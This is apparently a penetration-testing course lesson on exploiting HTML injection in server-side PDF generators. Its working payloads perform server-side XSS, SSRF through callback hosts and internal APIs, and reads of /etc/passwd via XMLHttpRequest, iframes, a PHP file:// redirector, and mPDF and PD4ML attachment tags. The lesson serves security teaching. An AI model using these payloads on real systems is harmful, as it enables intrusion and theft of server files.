Injection Attacks  

Exploitation of PDF Generation Vulnerabilities


Having covered how and why web applications use PDF generation libraries, let us look at how to exploit the vulnerabilities that arise in them and the misconfigurations that cause them. All of these vulnerabilities require user-provided content to be inserted into the HTML input of the PDF generator.


JavaScript Code Execution

The first exploit we will explore is the injection of JavaScript code, since the execution of injected JavaScript code enables further attack vectors. Because the PDF generation library renders HTML input, it might execute our injected JavaScript code. Furthermore, with the PDF generation library running on the server, the payload would also be executed on the server, which is why this type of vulnerability is also called Server-Side XSS.

To demonstrate Server-Side XSS, let us take a look at a sample note-taking web application:

By clicking on the printer icon, the web application generates a printable PDF containing all our notes:

image

Since all the attack requires is the ability to inject HTML code, we will test whether the PDF generation library interprets the HTML code we provide. First, we will create a new note with a simple bold tag that contains our HTML payload:

Since the web application correctly escapes the HTML payload, the text between the tags has not become bold. Thus, the web application is secure against classical XSS attacks. However, if we generate a PDF, we can see that the text between the tags has become bold in the note's body, indicating that the PDF generation library is vulnerable to HTML injection and potentially Server-Side XSS:

image
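The difference between the two views comes down to where escaping happens. The following is a minimal sketch of the step the PDF code path evidently skips. It is an assumption about how such an application might be structured, not the sample application's actual code, and the names escapeHtml and buildPdfHtml are hypothetical:

```javascript
// Hypothetical helper: replace the characters that have special meaning in HTML.
function escapeHtml(text) {
  return String(text)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Hypothetical template for the HTML that is handed to the PDF generator.
// Every note is escaped before it is placed into the markup.
function buildPdfHtml(notes) {
  const items = notes.map((note) => `<li>${escapeHtml(note)}</li>`).join("");
  return `<html><body><ul>${items}</ul></body></html>`;
}

console.log(buildPdfHtml(["<b>bold?</b>"]));
```

If the note body reaches the PDF generator without a step like escapeHtml, the generator sees real tags instead of text, which is exactly what the bold text in the PDF indicates.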

In the second step, we need to verify whether the server executes injected JavaScript code. We can use a payload similar to the following:

<script>document.write('test1')</script>

After generating a PDF, we can see the string test1 in the PDF. Thus, the backend executed our injected JavaScript code and wrote the string to the DOM before generating the PDF.

image
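A static string such as test1 can be ambiguous if the generator prints parts of the payload as text. One way to rule this out is a probe whose output differs from its source, for example a computed value. The sketch below is only an illustration: buildJsProbe and classifyProbe are hypothetical helpers, and extracting the text from the generated PDF is assumed to happen elsewhere.

```javascript
// Build a probe whose executed output ("js-<product>") never appears in its source text.
function buildJsProbe(a, b) {
  return {
    payload: `<script>document.write('js-' + (${a} * ${b}))</script>`,
    executedMarker: `js-${a * b}`,
  };
}

// Classify text copied from the generated PDF for a given probe.
function classifyProbe(pdfText, probe) {
  if (pdfText.includes(probe.executedMarker)) return "executed";
  if (pdfText.includes("document.write")) return "rendered as text";
  return "stripped or not rendered";
}

const probe = buildJsProbe(7, 191);
console.log(probe.payload);
console.log(classifyProbe("My notes js-1337", probe));
```

Only a backend that actually evaluates the script can produce the marker js-1337, since the payload itself contains only the two factors.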

As a simple first exploit, let us force an information disclosure that leaks a path on the web server. We can do so with the following payload:

<script>document.write(window.location)</script>

The window.location property stores the current location of the JavaScript context. Since this is a local file on the server's filesystem, it displays the local path on the server where generated PDF files are stored:

image
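The leaked value is a file:// URL rather than a plain path. As a small sketch, assuming a Unix-style path on the server, we can split it into the file path and its directory. The function name parseLeakedLocation and the example path are made up for illustration and are not output from the sample application:

```javascript
// Split a leaked file:// URL into the file path and the directory that contains it.
function parseLeakedLocation(leaked) {
  const url = new URL(leaked.trim());
  if (url.protocol !== "file:") {
    // Not a local file; the renderer loaded the document from elsewhere.
    return { protocol: url.protocol, path: null, directory: null };
  }
  const path = decodeURIComponent(url.pathname); // undo percent-encoding such as %20
  const directory = path.slice(0, path.lastIndexOf("/") + 1);
  return { protocol: url.protocol, path, directory };
}

// Made-up example value.
console.log(parseLeakedLocation("file:///var/www/app/tmp/notes%20export.html"));
```

The directory is usually the more interesting part, since it hints at where the application keeps its temporary or generated files.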

The execution of JavaScript can lead to further and more severe vulnerabilities, which we will discuss in the following sub-sections.


Server-Side Request Forgery

One of the most common vulnerabilities in combination with PDF generation is Server-Side Request Forgery (SSRF). Since HTML documents commonly load resources such as stylesheets or images from external sources, displaying an HTML document inherently requires the server to send requests to these external sources to fetch them. Since we can inject arbitrary HTML code into the PDF generator's input, we can force the server to send such a GET request to any URL we choose, including internal web applications.

We can inject many different HTML tags to force the server to send an HTTP request. For instance, we can inject an image tag pointing to a URL under our control to confirm SSRF. As an example, we are going to use the img tag with a domain from Interactsh:

<img src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest1"/>

Similarly, we can also inject a stylesheet using the link tag:

<link rel="stylesheet" href="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest2" >

Generally, for images and stylesheets, the response is not displayed in the generated PDF, so we only have a blind SSRF vulnerability, which restricts our ability to exploit it. However, depending on the (mis)configuration of the PDF generation library, we can inject other HTML elements that trigger a request and make the server display the response. An example of this is an iframe:

<iframe src="http://cf8kzfn2vtc0000n9fbgg8wj9zhyyyyyb.oast.fun/ssrftest3"></iframe>
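Giving each probe its own path makes it easy to tell which tag caused which callback. The following sketch builds the three payloads above from a single callback host and maps observed request paths back to tags. The helper names, the path names, and the host callback.example are placeholders, not part of Interactsh:

```javascript
// One distinct path per tag so that callbacks can be told apart.
const PROBE_PATHS = new Map([
  ["img", "/ssrf-img"],
  ["link", "/ssrf-link"],
  ["iframe", "/ssrf-iframe"],
]);

// Build the three probe payloads for a given callback host.
function buildSsrfProbes(callbackHost) {
  const base = `http://${callbackHost}`;
  return {
    img: `<img src="${base}${PROBE_PATHS.get("img")}"/>`,
    link: `<link rel="stylesheet" href="${base}${PROBE_PATHS.get("link")}">`,
    iframe: `<iframe src="${base}${PROBE_PATHS.get("iframe")}"></iframe>`,
  };
}

// Given the request paths seen on the callback server, list the tags that fired.
function tagsThatFired(requestPaths) {
  const seen = new Set(requestPaths);
  return [...PROBE_PATHS].filter(([, path]) => seen.has(path)).map(([tag]) => tag);
}

console.log(buildSsrfProbes("callback.example"));
console.log(tagsThatFired(["/ssrf-iframe", "/favicon.ico", "/ssrf-img"]));
```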

Injecting the three payloads and generating a PDF results in three requests to our Interactsh domain, which confirms SSRF with all three payloads:

Furthermore, looking at the generated PDF, we can see that the injected iframe contains the HTTP response sent by Interactsh:

image

Thus, we do not have a blind SSRF vulnerability but a regular SSRF, which is significantly more severe as it allows us to exfiltrate data more easily. For instance, we can make a request to any internal endpoint, and get the response displayed to us. As an example, we can leak data from an internal API like so:

<iframe src="http://127.0.0.1:8080/api/users" width="800" height="500"></iframe>

The generated PDF contains the response from the internal API, potentially revealing sensitive information to us that we are unable to access externally:

image
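When the internal endpoint is not known in advance, the same iframe payload can be generated for several candidate URLs. This is a rough sketch only: buildIframePayloads is a hypothetical helper, and the ports and paths passed to it are guesses that would need to be adapted to the target.

```javascript
// Build one iframe payload per candidate internal URL (every port combined with every path).
function buildIframePayloads(host, ports, paths) {
  const payloads = [];
  for (const port of ports) {
    for (const path of paths) {
      const url = new URL(path, `http://${host}:${port}`);
      payloads.push(`<iframe src="${url.href}" width="800" height="500"></iframe>`);
    }
  }
  return payloads;
}

console.log(buildIframePayloads("127.0.0.1", [8080, 8000], ["/api/users", "/"]).join("\n"));
```

Each payload can go into its own note so that the responses appear in separate frames of the generated PDF.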

For more details on SSRF exploitation, check out the Server-side Attacks module.


Local File Inclusion

Another powerful vulnerability we can potentially exploit with the help of PDF generation libraries is Local File Inclusion (LFI). There are multiple HTML elements we can try to inject to read local files on the server.

With JavaScript Execution

If the server executes our injected JavaScript, we can read local files using an XMLHttpRequest and the file protocol, resulting in a payload similar to the following:

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(this.responseText)
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

Injecting this JavaScript code, we can see the content of the passwd file in the generated PDF:

image

However, this is impractical for some files since copying data out of the PDF can corrupt it. For instance, the formatting of an SSH key most likely breaks when we copy it out of the PDF. Additionally, we cannot exfiltrate files containing binary data this way. Thus, we should base64-encode the file using the btoa function before writing it to the PDF:

<script>
	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(btoa(this.responseText))
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

However, doing so creates a single long line that does not fit onto the PDF page. Typically, the PDF generation library will not insert line breaks, so the line is cut off at the edge of the page:

image

We can easily modify our payload to inject linebreaks every 100 characters to ensure that it fits on the PDF page:

<script>
	function addNewlines(str) {
		var result = '';
		while (str.length > 0) {
			result += str.substring(0, 100) + '\n';
			str = str.substring(100);
		}
		return result;
	}

	x = new XMLHttpRequest();
	x.onload = function(){
		document.write(addNewlines(btoa(this.responseText)))
	};
	x.open("GET", "file:///etc/passwd");
	x.send();
</script>

After doing so, we can finally retrieve the file without issues. We can now copy the base64-encoded data and decode it using any tool that ignores the linebreaks in the base64-encoded input, such as CyberChef:

image
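If we prefer to decode the data locally, a few lines of Node.js are enough. The sketch below repeats the addNewlines function from the payload so that it is self-contained, and adds a hypothetical decodeWrappedBase64 helper that strips all whitespace before decoding. The sample input is made up:

```javascript
// Same wrapping logic as in the payload above: a newline after every 100 characters.
function addNewlines(str) {
  let result = "";
  while (str.length > 0) {
    result += str.substring(0, 100) + "\n";
    str = str.substring(100);
  }
  return result;
}

// Remove whitespace introduced by wrapping or by copying from the PDF, then decode.
// btoa treats each character as one byte, so latin1 restores the original string.
function decodeWrappedBase64(copied) {
  const compact = copied.replace(/\s+/g, "");
  return Buffer.from(compact, "base64").toString("latin1");
}

const original = "root:x:0:0:root:/root:/bin/bash\n".repeat(10);
const wrapped = addNewlines(btoa(original));
console.log(decodeWrappedBase64(wrapped) === original);
```

Stripping every whitespace character, not just newlines, also covers spaces that a PDF viewer may insert when text is copied.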

Without JavaScript Execution

If the backend does not execute our injected JavaScript code, we must use other HTML tags to display local files. We can try the following payloads:

<iframe src="file:///etc/passwd" width="800" height="500"></iframe>
<object data="file:///etc/passwd" width="800" height="500"></object>
<portal src="file:///etc/passwd" width="800" height="500"></portal>

However, doing so in our test environment only displays an empty iframe:

image

Fortunately, there is one more trick we can try in combination with iframes. As discussed in the SSRF section, some PDF generation libraries display the response to requests in iframes. However, as the screenshot above shows, we sometimes cannot use iframes to access files directly. Instead, we can set the src attribute to a server under our control that redirects incoming requests to a local file. If the library is misconfigured, it may follow the redirect and display the file. To do so, we can run the following PHP script on our server. It responds to every incoming request with an HTTP 302 redirect whose Location header points to a local file via the file protocol:

<?php header('Location: file://' . $_GET['url']); ?>

We can then inject the following payload, where the IP points to the server we are running the redirector script on:

<iframe src="http://172.17.0.1:8000/redirector.php?url=%2fetc%2fpasswd" width="800" height="500"></iframe>

After doing so, the generated PDF now contains the leaked file:

image
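If PHP is not available on our server, the same redirect logic can be sketched in Node.js. This is an assumed equivalent of the PHP script above, not part of the original setup. The names redirectLocation and handleRequest are hypothetical, and unlike the PHP one-liner the sketch answers with HTTP 400 when the url parameter is missing:

```javascript
// Compute the Location header for a request URL such as "/redirector.php?url=%2fetc%2fpasswd".
// Returns null if the request carries no url parameter.
function redirectLocation(requestUrl) {
  // The base is only needed to parse a relative request URL; it is never contacted.
  const parsed = new URL(requestUrl, "http://placeholder.invalid");
  const target = parsed.searchParams.get("url"); // already percent-decoded
  return target === null ? null : `file://${target}`;
}

// Request handler in the shape expected by Node's http.createServer.
function handleRequest(req, res) {
  const location = redirectLocation(req.url);
  if (location === null) {
    res.writeHead(400);
    res.end("missing url parameter");
    return;
  }
  res.writeHead(302, { Location: location });
  res.end();
}

console.log(redirectLocation("/redirector.php?url=%2fetc%2fpasswd"));
```

To serve it on the port used in the payload above, the handler can be passed to Node's built-in http module, for example with require("node:http").createServer(handleRequest).listen(8000).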

For more details on LFI exploitation, check out the File Inclusion module.

Annotations

While we have already discussed how to include local files in the PDF pages, PDF files support advanced features like annotations and attachments, which we can also use to leak local files on the server. This is particularly interesting if the previously discussed payloads do not work.

For example, consider the PDF generation library mPDF, which supports annotations via the <annotation> tag. We can use annotations to append files to the generated PDF file by injecting a payload like the following:

<annotation file="/etc/passwd" content="/etc/passwd" icon="Graph" title="LFI" />

Looking at the generated PDF file, we can see the annotation with the attached file. Clicking on the attachment reveals the attached /etc/passwd file:

image

As we can see in this GitHub Issue, annotations are disabled by default after mPDF 6.0, so web applications using an outdated version of mPDF are most likely vulnerable. However, the option can still be enabled in newer versions, so it is also worth testing web applications that use an up-to-date mPDF version.

Another PDF generation library that supports attachments is PD4ML. We can check the syntax in the documentation. As a proof-of-concept, we can use the following payload:

<pd4ml:attachment src="/etc/passwd" description="LFI" icon="Paperclip"/>

Again, if we look at the generated PDF file, we can see the annotation with the attached file:

image

Like before, the file is revealed if we click on the annotation. As we can see, it is essential to read the documentation of the specific PDF generation library used by our target web application to see if we can identify any functionality we can potentially exploit. Custom tags like pd4ml:attachment that enable access to local files are particularly interesting.
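Not every PDF viewer shows attachment icons, so it can help to check the raw PDF for attachment-related names. The sketch below is a heuristic only: findAttachmentMarkers is a hypothetical helper that searches the file's bytes for the PDF names FileAttachment, EmbeddedFile, and Filespec. It can miss attachments whose objects are stored in compressed object streams.

```javascript
// Heuristic check: look for attachment-related PDF names in the raw bytes.
function findAttachmentMarkers(pdfBytes) {
  // latin1 maps every byte to exactly one character, so no bytes are lost or merged.
  const text = Buffer.from(pdfBytes).toString("latin1");
  const markers = ["/FileAttachment", "/EmbeddedFile", "/Filespec"];
  return markers.filter((marker) => text.includes(marker));
}

// Synthetic fragment for illustration, not a complete PDF file.
const fragment = Buffer.from(
  "%PDF-1.4\n" +
  "1 0 obj << /Type /Annot /Subtype /FileAttachment /FS 2 0 R >> endobj\n" +
  "2 0 obj << /Type /Filespec /F (passwd) >> endobj\n",
  "latin1"
);
console.log(findAttachmentMarkers(fragment));
```

For a real file, the bytes could be read with Node's fs.readFileSync and passed to the function directly.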
